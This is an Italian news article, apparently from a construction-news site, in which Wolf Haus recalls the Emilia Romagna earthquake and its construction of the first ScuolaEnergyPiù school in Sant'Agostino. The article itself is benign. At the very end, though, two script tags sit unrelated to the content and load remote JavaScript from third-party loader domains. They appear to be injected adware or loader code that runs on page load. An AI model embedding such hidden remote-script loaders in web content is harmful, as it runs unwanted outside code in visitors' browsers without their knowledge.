1. Home
  2. Notizie e Mercato
  3. La parola a Wolf Haus: insieme per una ricostruzione sostenibile

La parola a Wolf Haus: insieme per una ricostruzione sostenibile

Sostenibilità di
Wolf Haus e l’Associazione RiLAQUILA si sono recate in Emilia Romagna subito dopo il terremoto di un anno fa creando la prima ScuolaEnergyPiù


Un anno fa ilterremoto che sconvolse l'Emilia Romagna ha aperto una ferita profonda in un territorio che da sempre è la culla dell'accoglienza e il cuore pulsante dell'economia italiana. Dopo pochi giorni Wolf Haus, insieme all'Associazione RiLAQUILA, si è recata immediatamente a portare un sostegno concreto alle popolazioni colpite, e lì ha trovato una comunità desiderosa di rinascere dalle macerie. Con una grande collaborazione tra le istituzioni, e grazie al coinvolgimento di Mediafriends Onlus, Il Resto del Carlino e il TG5, in pochissimi mesi abbiamo realizzato la prima scuola definitiva costruita dopo il terremoto: una struttura unica anche per essere la prima ScuolaEnergyPiù realizzata in Italia.

Questa scuola, realizzata a Sant'Agostino, uno dei centri maggiormente devastati dal sisma, rappresenta una nuova alba per una terra che ha trovato subito la forza di rialzarsi e tornare a vivere. Con la nuova Scuola EnergyPiù, dare una certezza alla formazione, e quindi al futuro dei ragazzi, significa per tante famiglie avere la serenità e la sicurezza per il futuro dei propri figli.

In occasione di questo anniversario il nostro pensiero e tutta la nostra solidarietà è per chi ha perso la vita, e per coloro i quali hanno ancora la propria abitazione distrutta o lesionata: per questo vogliamo ribadire con fermezza l'importanza di costruire ogni casa, scuola, azienda, ufficio con i migliori criteri di sicurezza sismica, poiché la vita di ogni persona, per chi costruisce, deve essere la priorità assoluta.

Con il nostro impegno e la passione che da sempre caratterizza la nostra mission, continueremo a sostenere l'Emilia, la sua gente e le istituzioni locali in quella che può, e deve essere, una ricostruzione sicura e sostenibile.

LINK: http://www.wolfhaus.it/index.php?id=6931



<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>